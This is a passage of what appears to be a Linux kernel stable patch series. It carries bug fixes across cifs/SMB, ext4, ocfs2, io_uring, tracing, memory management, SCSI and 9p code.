+ int dfs_cache_get_tgt_share(char *path, const struct dfs_cache_tgt_iterator *it, char **share,
+ 			    char **prefix);
+-void dfs_cache_put_refsrv_sessions(const uuid_t *mount_id);
+-void dfs_cache_add_refsrv_session(const uuid_t *mount_id, struct cifs_ses *ses);
+ char *dfs_cache_canonical_path(const char *path, const struct nls_table *cp, int remap);
+ int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb);
+ 
+diff --git a/fs/cifs/fs_context.h b/fs/cifs/fs_context.h
+index 44cb5639ed3ba..1b8d4e27f831c 100644
+--- a/fs/cifs/fs_context.h
++++ b/fs/cifs/fs_context.h
+@@ -265,6 +265,7 @@ struct smb3_fs_context {
+ 	bool rootfs:1; /* if it's a SMB root file system */
+ 	bool witness:1; /* use witness protocol */
+ 	char *leaf_fullpath;
++	struct cifs_ses *dfs_root_ses;
+ };
+ 
+ extern const struct fs_parameter_spec smb3_fs_parameters[];
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index ae0679f0c0d25..9f4486b705d5c 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -22,6 +22,7 @@
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ #include "dns_resolve.h"
+ #include "dfs_cache.h"
++#include "dfs.h"
+ #endif
+ #include "fs_context.h"
+ #include "cached_dir.h"
+@@ -134,6 +135,9 @@ tconInfoAlloc(void)
+ 	spin_lock_init(&ret_buf->stat_lock);
+ 	atomic_set(&ret_buf->num_local_opens, 0);
+ 	atomic_set(&ret_buf->num_remote_opens, 0);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	INIT_LIST_HEAD(&ret_buf->dfs_ses_list);
++#endif
+ 
+ 	return ret_buf;
+ }
+@@ -149,6 +153,9 @@ tconInfoFree(struct cifs_tcon *tcon)
+ 	atomic_dec(&tconInfoAllocCount);
+ 	kfree(tcon->nativeFileSystem);
+ 	kfree_sensitive(tcon->password);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	dfs_put_root_smb_sessions(&tcon->dfs_ses_list);
++#endif
+ 	kfree(tcon);
+ }
+ 
+@@ -1357,6 +1364,7 @@ int cifs_inval_name_dfs_link_error(const unsigned int xid,
+ 		 * removing cached DFS targets that the client would eventually
+ 		 * need during failover.
+ 		 */
++		ses = CIFS_DFS_ROOT_SES(ses);
+ 		if (ses->server->ops->get_dfs_refer &&
+ 		    !ses->server->ops->get_dfs_refer(xid, ses, ref_path, &refs,
+ 						     &num_refs, cifs_sb->local_nls,
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 9b956294e8643..8dd3791b5c538 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -234,15 +234,32 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 		size[0] = 8; /* sizeof __le64 */
+ 		data[0] = ptr;
+ 
+-		rc = SMB2_set_info_init(tcon, server,
+-					&rqst[num_rqst], COMPOUND_FID,
+-					COMPOUND_FID, current->tgid,
+-					FILE_END_OF_FILE_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
++		if (cfile) {
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						cfile->fid.persistent_fid,
++						cfile->fid.volatile_fid,
++						current->tgid,
++						FILE_END_OF_FILE_INFORMATION,
++						SMB2_O_INFO_FILE, 0,
++						data, size);
++		} else {
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						COMPOUND_FID,
++						COMPOUND_FID,
++						current->tgid,
++						FILE_END_OF_FILE_INFORMATION,
++						SMB2_O_INFO_FILE, 0,
++						data, size);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
+ 		if (rc)
+ 			goto finished;
+-		smb2_set_next_command(tcon, &rqst[num_rqst]);
+-		smb2_set_related(&rqst[num_rqst++]);
++		num_rqst++;
+ 		trace_smb3_set_eof_enter(xid, ses->Suid, tcon->tid, full_path);
+ 		break;
+ 	case SMB2_OP_SET_INFO:
+diff --git a/fs/cifs/smb2transport.c b/fs/cifs/smb2transport.c
+index 381babc1212c9..d827b7547ffad 100644
+--- a/fs/cifs/smb2transport.c
++++ b/fs/cifs/smb2transport.c
+@@ -425,7 +425,7 @@ generate_smb3signingkey(struct cifs_ses *ses,
+ 
+ 		/* safe to access primary channel, since it will never go away */
+ 		spin_lock(&ses->chan_lock);
+-		memcpy(ses->chans[0].signkey, ses->smb3signingkey,
++		memcpy(ses->chans[chan_index].signkey, ses->smb3signingkey,
+ 		       SMB3_SIGN_KEY_SIZE);
+ 		spin_unlock(&ses->chan_lock);
+ 
+diff --git a/fs/cifs/transport.c b/fs/cifs/transport.c
+index 3851d0aaa2886..c961b90f92b9f 100644
+--- a/fs/cifs/transport.c
++++ b/fs/cifs/transport.c
+@@ -297,7 +297,7 @@ static int
+ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 		struct smb_rqst *rqst)
+ {
+-	int rc = 0;
++	int rc;
+ 	struct kvec *iov;
+ 	int n_vec;
+ 	unsigned int send_length = 0;
+@@ -308,6 +308,7 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 	struct msghdr smb_msg = {};
+ 	__be32 rfc1002_marker;
+ 
++	cifs_in_send_inc(server);
+ 	if (cifs_rdma_enabled(server)) {
+ 		/* return -EAGAIN when connecting or reconnecting */
+ 		rc = -EAGAIN;
+@@ -316,14 +317,17 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 		goto smbd_done;
+ 	}
+ 
++	rc = -EAGAIN;
+ 	if (ssocket == NULL)
+-		return -EAGAIN;
++		goto out;
+ 
++	rc = -ERESTARTSYS;
+ 	if (fatal_signal_pending(current)) {
+ 		cifs_dbg(FYI, "signal pending before send request\n");
+-		return -ERESTARTSYS;
++		goto out;
+ 	}
+ 
++	rc = 0;
+ 	/* cork the socket */
+ 	tcp_sock_set_cork(ssocket->sk, true);
+ 
+@@ -434,7 +438,8 @@ smbd_done:
+ 			 rc);
+ 	else if (rc > 0)
+ 		rc = 0;
+-
++out:
++	cifs_in_send_dec(server);
+ 	return rc;
+ }
+ 
+@@ -853,9 +858,7 @@ cifs_call_async(struct TCP_Server_Info *server, struct smb_rqst *rqst,
+ 	 * I/O response may come back and free the mid entry on another thread.
+ 	 */
+ 	cifs_save_when_sent(mid);
+-	cifs_in_send_inc(server);
+ 	rc = smb_send_rqst(server, 1, rqst, flags);
+-	cifs_in_send_dec(server);
+ 
+ 	if (rc < 0) {
+ 		revert_current_mid(server, mid->credits);
+@@ -1146,9 +1149,7 @@ compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
+ 		else
+ 			midQ[i]->callback = cifs_compound_last_callback;
+ 	}
+-	cifs_in_send_inc(server);
+ 	rc = smb_send_rqst(server, num_rqst, rqst, flags);
+-	cifs_in_send_dec(server);
+ 
+ 	for (i = 0; i < num_rqst; i++)
+ 		cifs_save_when_sent(midQ[i]);
+@@ -1398,9 +1399,7 @@ SendReceive(const unsigned int xid, struct cifs_ses *ses,
+ 
+ 	midQ->mid_state = MID_REQUEST_SUBMITTED;
+ 
+-	cifs_in_send_inc(server);
+ 	rc = smb_send(server, in_buf, len);
+-	cifs_in_send_dec(server);
+ 	cifs_save_when_sent(midQ);
+ 
+ 	if (rc < 0)
+@@ -1541,9 +1540,7 @@ SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
+ 	}
+ 
+ 	midQ->mid_state = MID_REQUEST_SUBMITTED;
+-	cifs_in_send_inc(server);
+ 	rc = smb_send(server, in_buf, len);
+-	cifs_in_send_dec(server);
+ 	cifs_save_when_sent(midQ);
+ 
+ 	if (rc < 0)
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 7cc3918e2f189..604ee458f31d7 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -3884,10 +3884,8 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 				goto end_rename;
+ 		}
+ 		retval = ext4_rename_dir_prepare(handle, &old);
+-		if (retval) {
+-			inode_unlock(old.inode);
++		if (retval)
+ 			goto end_rename;
+-		}
+ 	}
+ 	/*
+ 	 * If we're renaming a file within an inline_data dir and adding or
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index c81fa0fa9901a..e79ca9ef98316 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -5967,8 +5967,11 @@ static int ext4_load_journal(struct super_block *sb,
+ 	if (!really_read_only && journal_devnum &&
+ 	    journal_devnum != le32_to_cpu(es->s_journal_dev)) {
+ 		es->s_journal_dev = cpu_to_le32(journal_devnum);
+-
+-		/* Make sure we flush the recovery flag to disk. */
++		ext4_commit_super(sb);
++	}
++	if (!really_read_only && journal_inum &&
++	    journal_inum != le32_to_cpu(es->s_journal_inum)) {
++		es->s_journal_inum = cpu_to_le32(journal_inum);
+ 		ext4_commit_super(sb);
+ 	}
+ 
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 494994d9a332b..f66c3fae90584 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -388,6 +388,17 @@ static int ext4_xattr_inode_iget(struct inode *parent, unsigned long ea_ino,
+ 	struct inode *inode;
+ 	int err;
+ 
++	/*
++	 * We have to check for this corruption early as otherwise
++	 * iget_locked() could wait indefinitely for the state of our
++	 * parent inode.
++	 */
++	if (parent->i_ino == ea_ino) {
++		ext4_error(parent->i_sb,
++			   "Parent and EA inode have the same ino %lu", ea_ino);
++		return -EFSCORRUPTED;
++	}
++
+ 	inode = ext4_iget(parent->i_sb, ea_ino, EXT4_IGET_NORMAL);
+ 	if (IS_ERR(inode)) {
+ 		err = PTR_ERR(inode);
+diff --git a/fs/ocfs2/aops.c b/fs/ocfs2/aops.c
+index 1d65f6ef00ca8..0394505fdce3f 100644
+--- a/fs/ocfs2/aops.c
++++ b/fs/ocfs2/aops.c
+@@ -1977,11 +1977,26 @@ int ocfs2_write_end_nolock(struct address_space *mapping,
+ 	}
+ 
+ 	if (unlikely(copied < len) && wc->w_target_page) {
++		loff_t new_isize;
++
+ 		if (!PageUptodate(wc->w_target_page))
+ 			copied = 0;
+ 
+-		ocfs2_zero_new_buffers(wc->w_target_page, start+copied,
+-				       start+len);
++		new_isize = max_t(loff_t, i_size_read(inode), pos + copied);
++		if (new_isize > page_offset(wc->w_target_page))
++			ocfs2_zero_new_buffers(wc->w_target_page, start+copied,
++					       start+len);
++		else {
++			/*
++			 * When page is fully beyond new isize (data copy
++			 * failed), do not bother zeroing the page. Invalidate
++			 * it instead so that writeback does not get confused
++			 * put page & buffer dirty bits into inconsistent
++			 * state.
++			 */
++			block_invalidate_folio(page_folio(wc->w_target_page),
++						0, PAGE_SIZE);
++		}
+ 	}
+ 	if (wc->w_target_page)
+ 		flush_dcache_page(wc->w_target_page);
+diff --git a/include/drm/drm_bridge.h b/include/drm/drm_bridge.h
+index 6b65b0dfb4fb4..288c6feda5de2 100644
+--- a/include/drm/drm_bridge.h
++++ b/include/drm/drm_bridge.h
+@@ -447,11 +447,11 @@ struct drm_bridge_funcs {
+ 	 *
+ 	 * The returned array must be allocated with kmalloc() and will be
+ 	 * freed by the caller. If the allocation fails, NULL should be
+-	 * returned. num_output_fmts must be set to the returned array size.
++	 * returned. num_input_fmts must be set to the returned array size.
+ 	 * Formats listed in the returned array should be listed in decreasing
+ 	 * preference order (the core will try all formats until it finds one
+ 	 * that works). When the format is not supported NULL should be
+-	 * returned and num_output_fmts should be set to 0.
++	 * returned and num_input_fmts should be set to 0.
+ 	 *
+ 	 * This method is called on all elements of the bridge chain as part of
+ 	 * the bus format negotiation process that happens in
+diff --git a/include/drm/drm_gem.h b/include/drm/drm_gem.h
+index a17c2f903f81e..b46ade8124436 100644
+--- a/include/drm/drm_gem.h
++++ b/include/drm/drm_gem.h
+@@ -475,7 +475,9 @@ int drm_gem_dumb_map_offset(struct drm_file *file, struct drm_device *dev,
+ void drm_gem_lru_init(struct drm_gem_lru *lru, struct mutex *lock);
+ void drm_gem_lru_remove(struct drm_gem_object *obj);
+ void drm_gem_lru_move_tail(struct drm_gem_lru *lru, struct drm_gem_object *obj);
+-unsigned long drm_gem_lru_scan(struct drm_gem_lru *lru, unsigned nr_to_scan,
++unsigned long drm_gem_lru_scan(struct drm_gem_lru *lru,
++			       unsigned int nr_to_scan,
++			       unsigned long *remaining,
+ 			       bool (*shrink)(struct drm_gem_object *obj));
+ 
+ #endif /* __DRM_GEM_H__ */
+diff --git a/include/linux/blk-mq.h b/include/linux/blk-mq.h
+index 779fba613bd09..19ae71f3fb97d 100644
+--- a/include/linux/blk-mq.h
++++ b/include/linux/blk-mq.h
+@@ -228,6 +228,12 @@ static inline unsigned short req_get_ioprio(struct request *req)
+ 	*(listptr) = rq;				\
+ } while (0)
+ 
++#define rq_list_add_tail(lastpptr, rq)	do {		\
++	(rq)->rq_next = NULL;				\
++	**(lastpptr) = rq;				\
++	*(lastpptr) = &rq->rq_next;			\
++} while (0)
++
+ #define rq_list_pop(listptr)				\
+ ({							\
+ 	struct request *__req = NULL;			\
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 43d4e073b1115..c3e066242941d 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -1434,11 +1434,10 @@ static inline void blk_wake_io_task(struct task_struct *waiter)
+ 		wake_up_process(waiter);
+ }
+ 
+-unsigned long bdev_start_io_acct(struct block_device *bdev,
+-				 unsigned int sectors, enum req_op op,
++unsigned long bdev_start_io_acct(struct block_device *bdev, enum req_op op,
+ 				 unsigned long start_time);
+ void bdev_end_io_acct(struct block_device *bdev, enum req_op op,
+-		unsigned long start_time);
++		      unsigned int sectors, unsigned long start_time);
+ 
+ unsigned long bio_start_io_acct(struct bio *bio);
+ void bio_end_io_acct_remapped(struct bio *bio, unsigned long start_time,
+diff --git a/include/linux/fb.h b/include/linux/fb.h
+index 73eb1f85ea8e5..05e40fcc76964 100644
+--- a/include/linux/fb.h
++++ b/include/linux/fb.h
+@@ -212,6 +212,7 @@ struct fb_deferred_io {
+ 	/* delay between mkwrite and deferred handler */
+ 	unsigned long delay;
+ 	bool sort_pagereflist; /* sort pagelist by offset */
++	int open_count; /* number of opened files; protected by fb_info lock */
+ 	struct mutex lock; /* mutex that protects the pageref list */
+ 	struct list_head pagereflist; /* list of pagerefs for touched pages */
+ 	/* callback */
+diff --git a/include/linux/interconnect-provider.h b/include/linux/interconnect-provider.h
+index cd5c5a27557f5..d12cd18aab3f4 100644
+--- a/include/linux/interconnect-provider.h
++++ b/include/linux/interconnect-provider.h
+@@ -122,6 +122,9 @@ int icc_link_destroy(struct icc_node *src, struct icc_node *dst);
+ void icc_node_add(struct icc_node *node, struct icc_provider *provider);
+ void icc_node_del(struct icc_node *node);
+ int icc_nodes_remove(struct icc_provider *provider);
++void icc_provider_init(struct icc_provider *provider);
++int icc_provider_register(struct icc_provider *provider);
++void icc_provider_deregister(struct icc_provider *provider);
+ int icc_provider_add(struct icc_provider *provider);
+ void icc_provider_del(struct icc_provider *provider);
+ struct icc_node_data *of_icc_get_from_provider(struct of_phandle_args *spec);
+@@ -167,6 +170,15 @@ static inline int icc_nodes_remove(struct icc_provider *provider)
+ 	return -ENOTSUPP;
+ }
+ 
++static inline void icc_provider_init(struct icc_provider *provider) { }
++
++static inline int icc_provider_register(struct icc_provider *provider)
++{
++	return -ENOTSUPP;
++}
++
++static inline void icc_provider_deregister(struct icc_provider *provider) { }
++
+ static inline int icc_provider_add(struct icc_provider *provider)
+ {
+ 	return -ENOTSUPP;
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index e6e02184c25a4..84668547fee63 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -295,9 +295,11 @@ struct hh_cache {
+  * relationship HH alignment <= LL alignment.
+  */
+ #define LL_RESERVED_SPACE(dev) \
+-	((((dev)->hard_header_len+(dev)->needed_headroom)&~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
++	((((dev)->hard_header_len + READ_ONCE((dev)->needed_headroom)) \
++	  & ~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
+ #define LL_RESERVED_SPACE_EXTRA(dev,extra) \
+-	((((dev)->hard_header_len+(dev)->needed_headroom+(extra))&~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
++	((((dev)->hard_header_len + READ_ONCE((dev)->needed_headroom) + (extra)) \
++	  & ~(HH_DATA_MOD - 1)) + HH_DATA_MOD)
+ 
+ struct header_ops {
+ 	int	(*create) (struct sk_buff *skb, struct net_device *dev,
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index 50042ea8e0083..db6ec828aa4b2 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -1437,6 +1437,7 @@ void pci_bus_add_resource(struct pci_bus *bus, struct resource *res,
+ 			  unsigned int flags);
+ struct resource *pci_bus_resource_n(const struct pci_bus *bus, int n);
+ void pci_bus_remove_resources(struct pci_bus *bus);
++void pci_bus_remove_resource(struct pci_bus *bus, struct resource *res);
+ int devm_request_pci_bus_resources(struct device *dev,
+ 				   struct list_head *resources);
+ 
+diff --git a/include/linux/sh_intc.h b/include/linux/sh_intc.h
+index c255273b02810..37ad81058d6ae 100644
+--- a/include/linux/sh_intc.h
++++ b/include/linux/sh_intc.h
+@@ -97,7 +97,10 @@ struct intc_hw_desc {
+ 	unsigned int nr_subgroups;
+ };
+ 
+-#define _INTC_ARRAY(a) a, __same_type(a, NULL) ? 0 : sizeof(a)/sizeof(*a)
++#define _INTC_SIZEOF_OR_ZERO(a) (_Generic(a,                 \
++                                 typeof(NULL):  0,           \
++                                 default:       sizeof(a)))
++#define _INTC_ARRAY(a) a, _INTC_SIZEOF_OR_ZERO(a)/sizeof(*a)
+ 
+ #define INTC_HW_DESC(vectors, groups, mask_regs,	\
+ 		     prio_regs,	sense_regs, ack_regs)	\
+diff --git a/include/linux/tracepoint.h b/include/linux/tracepoint.h
+index 4b33b95eb8be7..b01421902cfce 100644
+--- a/include/linux/tracepoint.h
++++ b/include/linux/tracepoint.h
+@@ -231,12 +231,11 @@ static inline struct tracepoint *tracepoint_ptr_deref(tracepoint_ptr_t *p)
+  * not add unwanted padding between the beginning of the section and the
+  * structure. Force alignment to the same alignment as the section start.
+  *
+- * When lockdep is enabled, we make sure to always do the RCU portions of
+- * the tracepoint code, regardless of whether tracing is on. However,
+- * don't check if the condition is false, due to interaction with idle
+- * instrumentation. This lets us find RCU issues triggered with tracepoints
+- * even when this tracepoint is off. This code has no purpose other than
+- * poking RCU a bit.
++ * When lockdep is enabled, we make sure to always test if RCU is
++ * "watching" regardless if the tracepoint is enabled or not. Tracepoints
++ * require RCU to be active, and it should always warn at the tracepoint
++ * site if it is not watching, as it will need to be active when the
++ * tracepoint is enabled.
+  */
+ #define __DECLARE_TRACE(name, proto, args, cond, data_proto)		\
+ 	extern int __traceiter_##name(data_proto);			\
+@@ -249,9 +248,7 @@ static inline struct tracepoint *tracepoint_ptr_deref(tracepoint_ptr_t *p)
+ 				TP_ARGS(args),				\
+ 				TP_CONDITION(cond), 0);			\
+ 		if (IS_ENABLED(CONFIG_LOCKDEP) && (cond)) {		\
+-			rcu_read_lock_sched_notrace();			\
+-			rcu_dereference_sched(__tracepoint_##name.funcs);\
+-			rcu_read_unlock_sched_notrace();		\
++			WARN_ON_ONCE(!rcu_is_watching());		\
+ 		}							\
+ 	}								\
+ 	__DECLARE_TRACE_RCU(name, PARAMS(proto), PARAMS(args),		\
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index 3642b8e3928b7..15169d75c251e 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -145,6 +145,7 @@ struct scsi_device {
+ 	const char * model;		/* ... after scan; point to static string */
+ 	const char * rev;		/* ... "nullnullnullnull" before scan */
+ 
++#define SCSI_DEFAULT_VPD_LEN	255	/* default SCSI VPD page size (max) */
+ 	struct scsi_vpd __rcu *vpd_pg0;
+ 	struct scsi_vpd __rcu *vpd_pg83;
+ 	struct scsi_vpd __rcu *vpd_pg80;
+@@ -215,6 +216,7 @@ struct scsi_device {
+ 					 * creation time */
+ 	unsigned ignore_media_change:1; /* Ignore MEDIA CHANGE on resume */
+ 	unsigned silence_suspend:1;	/* Do not print runtime PM related messages */
++	unsigned no_vpd_size:1;		/* No VPD size reported in header */
+ 
+ 	unsigned int queue_stopped;	/* request queue is quiesced */
+ 	bool offline_already;		/* Device offline message logged */
+diff --git a/include/scsi/scsi_devinfo.h b/include/scsi/scsi_devinfo.h
+index 5d14adae21c78..6b548dc2c4965 100644
+--- a/include/scsi/scsi_devinfo.h
++++ b/include/scsi/scsi_devinfo.h
+@@ -32,7 +32,8 @@
+ #define BLIST_IGN_MEDIA_CHANGE	((__force blist_flags_t)(1ULL << 11))
+ /* do not do automatic start on add */
+ #define BLIST_NOSTARTONADD	((__force blist_flags_t)(1ULL << 12))
+-#define __BLIST_UNUSED_13	((__force blist_flags_t)(1ULL << 13))
++/* do not ask for VPD page size first on some broken targets */
++#define BLIST_NO_VPD_SIZE	((__force blist_flags_t)(1ULL << 13))
+ #define __BLIST_UNUSED_14	((__force blist_flags_t)(1ULL << 14))
+ #define __BLIST_UNUSED_15	((__force blist_flags_t)(1ULL << 15))
+ #define __BLIST_UNUSED_16	((__force blist_flags_t)(1ULL << 16))
+@@ -74,8 +75,7 @@
+ #define __BLIST_HIGH_UNUSED (~(__BLIST_LAST_USED | \
+ 			       (__force blist_flags_t) \
+ 			       ((__force __u64)__BLIST_LAST_USED - 1ULL)))
+-#define __BLIST_UNUSED_MASK (__BLIST_UNUSED_13 | \
+-			     __BLIST_UNUSED_14 | \
++#define __BLIST_UNUSED_MASK (__BLIST_UNUSED_14 | \
+ 			     __BLIST_UNUSED_15 | \
+ 			     __BLIST_UNUSED_16 | \
+ 			     __BLIST_UNUSED_24 | \
+diff --git a/io_uring/msg_ring.c b/io_uring/msg_ring.c
+index 15602a136821b..be2695eb45ec1 100644
+--- a/io_uring/msg_ring.c
++++ b/io_uring/msg_ring.c
+@@ -183,7 +183,7 @@ static int io_msg_install_complete(struct io_kiocb *req, unsigned int issue_flag
+ 	 * completes with -EOVERFLOW, then the sender must ensure that a
+ 	 * later IORING_OP_MSG_RING delivers the message.
+ 	 */
+-	if (!io_post_aux_cqe(target_ctx, msg->user_data, msg->len, 0))
++	if (!io_post_aux_cqe(target_ctx, msg->user_data, ret, 0))
+ 		ret = -EOVERFLOW;
+ out_unlock:
+ 	io_double_unlock_ctx(target_ctx);
+@@ -210,6 +210,8 @@ static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
+ 	struct io_ring_ctx *ctx = req->ctx;
+ 	struct file *src_file = msg->src_file;
+ 
++	if (msg->len)
++		return -EINVAL;
+ 	if (target_ctx == ctx)
+ 		return -EINVAL;
+ 	if (target_ctx->flags & IORING_SETUP_R_DISABLED)
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index c4be13e50547b..8ae8a5055e205 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -2163,7 +2163,7 @@ static void perf_group_detach(struct perf_event *event)
+ 		/* Inherit group flags from the previous leader */
+ 		sibling->group_caps = event->group_caps;
+ 
+-		if (!RB_EMPTY_NODE(&event->group_node)) {
++		if (sibling->attach_state & PERF_ATTACH_CONTEXT) {
+ 			add_event_to_groups(sibling, event->ctx);
+ 
+ 			if (sibling->state == PERF_EVENT_STATE_ACTIVE)
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index 750aa3f08b25a..a47f7d93e32d2 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -1537,7 +1537,8 @@ static struct dyn_ftrace *lookup_rec(unsigned long start, unsigned long end)
+ 	key.flags = end;	/* overload flags, as it is unsigned long */
+ 
+ 	for (pg = ftrace_pages_start; pg; pg = pg->next) {
+-		if (end < pg->records[0].ip ||
++		if (pg->index == 0 ||
++		    end < pg->records[0].ip ||
+ 		    start >= (pg->records[pg->index - 1].ip + MCOUNT_INSN_SIZE))
+ 			continue;
+ 		rec = bsearch(&key, pg->records, pg->index,
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index b677f8d61deb1..1b692574fb0ca 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -5119,6 +5119,8 @@ loff_t tracing_lseek(struct file *file, loff_t offset, int whence)
+ static const struct file_operations tracing_fops = {
+ 	.open		= tracing_open,
+ 	.read		= seq_read,
++	.read_iter	= seq_read_iter,
++	.splice_read	= generic_file_splice_read,
+ 	.write		= tracing_write_stub,
+ 	.llseek		= tracing_lseek,
+ 	.release	= tracing_release,
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 5edbf6b1da3f3..10d36f751fcdb 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -1334,6 +1334,9 @@ static const char *hist_field_name(struct hist_field *field,
+ {
+ 	const char *field_name = "";
+ 
++	if (WARN_ON_ONCE(!field))
++		return field_name;
++
+ 	if (level > 1)
+ 		return field_name;
+ 
+@@ -4199,6 +4202,15 @@ static int __create_val_field(struct hist_trigger_data *hist_data,
+ 		goto out;
+ 	}
+ 
++	/* Some types cannot be a value */
++	if (hist_field->flags & (HIST_FIELD_FL_GRAPH | HIST_FIELD_FL_PERCENT |
++				 HIST_FIELD_FL_BUCKET | HIST_FIELD_FL_LOG2 |
++				 HIST_FIELD_FL_SYM | HIST_FIELD_FL_SYM_OFFSET |
++				 HIST_FIELD_FL_SYSCALL | HIST_FIELD_FL_STACKTRACE)) {
++		hist_err(file->tr, HIST_ERR_BAD_FIELD_MODIFIER, errpos(field_str));
++		ret = -EINVAL;
++	}
++
+ 	hist_data->fields[val_idx] = hist_field;
+ 
+ 	++hist_data->n_vals;
+diff --git a/kernel/trace/trace_hwlat.c b/kernel/trace/trace_hwlat.c
+index d440ddd5fd8b2..c4945f8adc119 100644
+--- a/kernel/trace/trace_hwlat.c
++++ b/kernel/trace/trace_hwlat.c
+@@ -492,6 +492,10 @@ static int start_cpu_kthread(unsigned int cpu)
+ {
+ 	struct task_struct *kthread;
+ 
++	/* Do not start a new hwlatd thread if it is already running */
++	if (per_cpu(hwlat_per_cpu_data, cpu).kthread)
++		return 0;
++
+ 	kthread = kthread_run_on_cpu(kthread_fn, NULL, cpu, "hwlatd/%u");
+ 	if (IS_ERR(kthread)) {
+ 		pr_err(BANNER "could not start sampling thread\n");
+@@ -584,9 +588,6 @@ static int start_per_cpu_kthreads(struct trace_array *tr)
+ 	 */
+ 	cpumask_and(current_mask, cpu_online_mask, tr->tracing_cpumask);
+ 
+-	for_each_online_cpu(cpu)
+-		per_cpu(hwlat_per_cpu_data, cpu).kthread = NULL;
+-
+ 	for_each_cpu(cpu, current_mask) {
+ 		retval = start_cpu_kthread(cpu);
+ 		if (retval)
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index d6651be1aa520..7624d22f92278 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2046,7 +2046,7 @@ static void __split_huge_zero_page_pmd(struct vm_area_struct *vma,
+ {
+ 	struct mm_struct *mm = vma->vm_mm;
+ 	pgtable_t pgtable;
+-	pmd_t _pmd;
++	pmd_t _pmd, old_pmd;
+ 	int i;
+ 
+ 	/*
+@@ -2057,7 +2057,7 @@ static void __split_huge_zero_page_pmd(struct vm_area_struct *vma,
+ 	 *
+ 	 * See Documentation/mm/mmu_notifier.rst
+ 	 */
+-	pmdp_huge_clear_flush(vma, haddr, pmd);
++	old_pmd = pmdp_huge_clear_flush(vma, haddr, pmd);
+ 
+ 	pgtable = pgtable_trans_huge_withdraw(mm, pmd);
+ 	pmd_populate(mm, &_pmd, pgtable);
+@@ -2066,6 +2066,8 @@ static void __split_huge_zero_page_pmd(struct vm_area_struct *vma,
+ 		pte_t *pte, entry;
+ 		entry = pfn_pte(my_zero_pfn(haddr), vma->vm_page_prot);
+ 		entry = pte_mkspecial(entry);
++		if (pmd_uffd_wp(old_pmd))
++			entry = pte_mkuffd_wp(entry);
+ 		pte = pte_offset_map(&_pmd, haddr);
+ 		VM_BUG_ON(!pte_none(*pte));
+ 		set_pte_at(mm, haddr, pte, entry);
+diff --git a/mm/mincore.c b/mm/mincore.c
+index a085a2aeabd8e..efdee2d03b53b 100644
+--- a/mm/mincore.c
++++ b/mm/mincore.c
+@@ -33,7 +33,7 @@ static int mincore_hugetlb(pte_t *pte, unsigned long hmask, unsigned long addr,
+ 	 * Hugepages under user process are always in RAM and never
+ 	 * swapped out, but theoretically it needs to be checked.
+ 	 */
+-	present = pte && !huge_pte_none(huge_ptep_get(pte));
++	present = pte && !huge_pte_none_mostly(huge_ptep_get(pte));
+ 	for (; addr != end; vec++, addr += PAGE_SIZE)
+ 		*vec = present;
+ 	walk->private = vec;
+diff --git a/net/9p/client.c b/net/9p/client.c
+index 622ec6a586eea..00a6d1e348768 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -1289,7 +1289,7 @@ int p9_client_create_dotl(struct p9_fid *ofid, const char *name, u32 flags,
+ 		 qid->type, qid->path, qid->version, iounit);
+ 
+ 	memmove(&ofid->qid, qid, sizeof(struct p9_qid));
+-	ofid->mode = mode;
++	ofid->mode = flags;
+ 	ofid->iounit = iounit;
+ 
+ free_and_error:
